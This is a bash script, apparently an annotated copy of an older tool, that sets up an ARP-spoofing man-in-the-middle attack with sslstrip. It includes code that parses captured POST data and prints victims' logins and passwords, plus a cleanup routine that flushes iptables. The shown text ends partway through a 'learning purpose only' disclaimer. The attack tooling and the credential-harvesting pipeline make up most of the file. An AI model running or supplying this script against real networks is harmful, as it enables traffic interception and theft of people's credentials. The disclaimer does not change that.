
#!/bin/bash
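# Bash script to launch a man-in-the-middle attack and sslstrip.
# version 0.9 by comaX
version="20130313"

# ARP spoofing, toggling ip_forward and rewriting iptables (see fast_cleanup
# below) all need root. The script only warns and carries on, so a non-root
# run fails later and more confusingly; the 3s pause makes the warning visible.
# (The original escape was "\033[31" without the closing "m", which leaves the
# terminal mid-CSI-sequence instead of switching to red.)
if [ "$UID" -ne 0 ]; then
  echo -e "\033[31mThis program must be run as root.
This will probably fail.\033[m"
  sleep 3
fi

# Directory where the script writes its logs; tilde expands to $HOME here.
log_output_dir=~
# Expected location of the sslstrip checkout (BackTrack layout).
sslstrip_dir=/pentest/web/sslstrip
# Default for the "offer to install missing tools" prompt; not consulted in
# the part of the script visible here.
ask_for_install=y

# Create the log directory if it does not exist yet. Quoted and with "--"
# so a path containing spaces or starting with "-" cannot break mkdir.
if [ ! -d "$log_output_dir" ]; then
  mkdir -p -- "$log_output_dir"
fi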

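# On ^C run fast_cleanup so the spoofer/sslstrip/dns jobs are killed and
# ip_forward / iptables are reset instead of leaving the host in MITM state.
# The handler name is only resolved when SIGINT actually arrives, so
# registering it before the function is defined below works; a ^C during
# the few lines in between would simply find no such function.
# fast_cleanup may try to kill processes that have already exited; the
# resulting kill errors are expected and harmless.
# (The original had the second half of this comment on an uncommented line,
# which bash executed as the command "may" on every run.)
trap fast_cleanup SIGINT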
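fast_cleanup()
{
  # SIGINT handler (installed with `trap fast_cleanup SIGINT` above): stop
  # every helper this script started, undo the host-level changes it made
  # (IP forwarding, iptables) and exit.
  # Globals read:
  #   looparseid, sslstripid, dnsid, etterspoofid - PIDs of background jobs
  #     started elsewhere in the script (assumed to hold one PID each, e.g.
  #     from $!; empty when that job was never started).
  #   etter - "1" when ettercap was used instead of arpspoof.
  # Exits with 0 regardless of whether every step succeeded.
  echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"

  # Only signal PIDs that were actually recorded. A job that already exited
  # makes kill complain; that is expected here, so its stderr is dropped.
  local pid
  for pid in "$looparseid" "$sslstripid" "$dnsid" "$etterspoofid"; do
    if [[ -n "$pid" ]]; then
      kill -- "$pid" 2>/dev/null
    fi
  done

  # The spoofer's PID is not tracked, so it is killed by name.
  if [[ "$etter" = "1" ]]; then
    killall ettercap 2>/dev/null
  else
    killall arpspoof 2>/dev/null
  fi

  # Stop forwarding the victims' traffic through this host. Note this forces
  # 0 rather than restoring whatever value was set before the script ran.
  echo "0" > /proc/sys/net/ipv4/ip_forward

  # CAUTION: these four commands wipe *every* rule and chain in the filter
  # and nat tables, not just the redirect sslstrip needed. Any firewall the
  # host had before the script started is gone afterwards; if that matters,
  # take an `iptables-save` snapshot before running and restore it here.
  iptables --flush
  iptables --table nat --flush
  iptables --delete-chain
  iptables --table nat --delete-chain

  echo -e "\033[32m[-] Clean up successful !\033[m"

  # Exit status 0 is kept for compatibility with the original; the
  # conventional status for a SIGINT-terminated script would be 130.
  exit 0
}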

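#Let's define some arguments that can be passed to the script :

# Build the pattern list the -p / -pl parsers feed to `egrep -i -f`: one
# credential-looking POST field name per line. It used to be downloaded on
# every run so it could be fixed remotely; it never needed fixing, and
# `egrep -f` wants a file anyway, so it is generated locally.
#
# SECURITY: /tmp/grepcred.txt is a predictable, world-writable-directory path
# and this script runs as root. A local user who pre-creates it as a symlink
# would otherwise have root overwrite the symlink target, and whoever
# controls its content controls what the parser treats as a credential. The
# -p/-pl parsers below reference this exact path, so it cannot be replaced
# by `mktemp` here without changing them too; instead the file is removed
# and re-created under noclobber (O_EXCL), which refuses to follow a symlink
# or reuse an existing file and aborts the run rather than proceeding.
# (The original listing had `echo -e` and its string on separate lines, so
# bash ran the string as a command and left the file empty.)
grepcred_file=/tmp/grepcred.txt
rm -f -- "$grepcred_file"
if ! ( set -C; printf '%s\n' credential email last log modified name nickname \
        pass persistent pw session textbox user website > "$grepcred_file" ); then
  echo -e "\033[31mCould not create $grepcred_file safely (it already exists or is a symlink).\033[m" >&2
  exit 1
fi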
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i;
print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else if ($1 ~/available/) print "";
else if ($1 ~/last/) print "";
else print "Login = \t"$2}' |
uniq
exit 0 ;;

-pl) while :
do
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i;
print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else if ($1 ~/available/) print "";
else if ($1 ~/last/) print "";
else print "Login = \t"$2}' |
uniq
sleep 3
done ;;

-e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."


etter="1"
shift
sleep 0.5 ;;

-h | --help) clear
echo -e "You are running $0, version $version.

usage : $0 -h -c -p -e -s -f
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : Stealth mode. The script won't download anything.
-f : Use a padlock favicon in sslstrip.

\033[31m DISCLAIMER :\033[m


This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m


This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. Th
